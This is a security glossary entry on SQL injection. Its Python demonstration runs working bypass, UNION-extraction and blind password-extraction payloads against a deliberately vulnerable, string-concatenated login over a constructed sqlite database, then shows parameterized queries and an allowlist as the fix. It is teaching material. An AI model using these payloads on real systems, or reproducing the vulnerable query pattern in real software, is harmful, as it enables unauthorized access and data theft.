D2 · Threats

What is SQL injection?

SQL injection (SQLi) happens when untrusted input is concatenated into a SQL statement so that the database parses it as SQL syntax rather than as a data value. Depending on the query and the database's privileges, it enables authentication bypass, extraction of data from other tables, data modification, and in some cases file access or operating-system command execution.
Classic example: supplying ' OR '1'='1 in a login form turns the WHERE clause into a condition that is true for every row, bypassing authentication. UNION SELECT appends rows from other tables to the query's result, extracting data the application never meant to return. Blind SQLi covers cases where no data is echoed back: the attacker infers it one condition at a time from true/false differences in the application's response (or from response timing). Prevention: parameterized queries/prepared statements for every value that comes from user input; the driver sends the SQL text and the values separately, so quotes and keywords in the input can never become syntax. Identifiers (table and column names, ORDER BY targets) cannot be parameterized and must be matched against a fixed allowlist. Input validation and least-privilege database accounts are defense-in-depth, not the primary fix.
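The following is an added example, not code from the original glossary entry. It uses Python's standard-library sqlite3 module with a constructed in-memory database (the users and api_keys tables, their columns and rows are assumptions made for the demo) to show the three attacks described above against a string-concatenated login query, the same login written with parameters, and an allowlist for the one part of a query that parameters cannot protect:

```python
import sqlite3
import string

# Constructed sample schema and data for the demonstration (not from the page).
def setup_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("CREATE TABLE api_keys (id INTEGER PRIMARY KEY, owner TEXT, secret TEXT)")
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                     [("alice", "correct horse"), ("bob", "hunter2")])
    conn.executemany("INSERT INTO api_keys (owner, secret) VALUES (?, ?)",
                     [("alice", "sk-alice-0001"), ("bob", "sk-bob-0002")])
    conn.commit()
    return conn

def login_vulnerable(conn, username, password):
    # VULNERABLE: user input is spliced into the SQL text, so a quote in the
    # input closes the string literal and everything after it is parsed as SQL.
    query = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
             % (username, password))
    return [row[0] for row in conn.execute(query).fetchall()]

def login_safe(conn, username, password):
    # SAFE: the SQL text is fixed; the driver binds the values separately,
    # so ' OR '1'='1 is compared literally against the column and matches nothing.
    rows = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password)).fetchall()
    return [row[0] for row in rows]

# Attack 1: authentication bypass. AND binds tighter than OR, so the WHERE
# clause becomes (username='x' AND password='') OR ('1'='1'), true for every row.
def bypass_login(conn):
    return login_vulnerable(conn, "x", "' OR '1'='1")

# Attack 2: UNION-based extraction. The injected SELECT must return the same
# number of columns (one here); the trailing -- comments out the rest of the query.
def dump_api_keys(conn):
    return login_vulnerable(conn, "' UNION SELECT secret FROM api_keys --", "x")

# Attack 3: boolean-based blind extraction. The attacker only observes whether
# the login succeeded, and recovers the password one character at a time.
def blind_extract_password(conn, target_user, charset=string.ascii_lowercase + string.digits + " "):
    recovered = ""
    while True:
        position = len(recovered) + 1
        for ch in charset:
            probe = "%s' AND substr(password,%d,1)='%s' --" % (target_user, position, ch)
            if login_vulnerable(conn, probe, "x"):   # a row came back: condition true
                recovered += ch
                break
        else:
            return recovered   # no character matched: past the end of the secret

# Identifiers cannot be bound as parameters, so a user-chosen sort column is
# checked against a fixed allowlist before it is placed in the SQL text.
SORTABLE_COLUMNS = {"id", "username"}

def list_users_sorted(conn, sort_column):
    if sort_column not in SORTABLE_COLUMNS:
        raise ValueError("unsupported sort column: %r" % sort_column)
    rows = conn.execute("SELECT username FROM users ORDER BY " + sort_column).fetchall()
    return [row[0] for row in rows]

if __name__ == "__main__":
    db = setup_db()
    print("bypass  ->", bypass_login(db))
    print("union   ->", dump_api_keys(db))
    print("blind   ->", blind_extract_password(db, "alice"))
    print("safe    ->", login_safe(db, "x", "' OR '1'='1"))
```

The blind routine shows why "no error message and no data shown" is not a defense: roughly a few hundred true/false queries recover the whole secret. Only login_safe is immune, and it is immune because the query text never changes, not because any character was filtered.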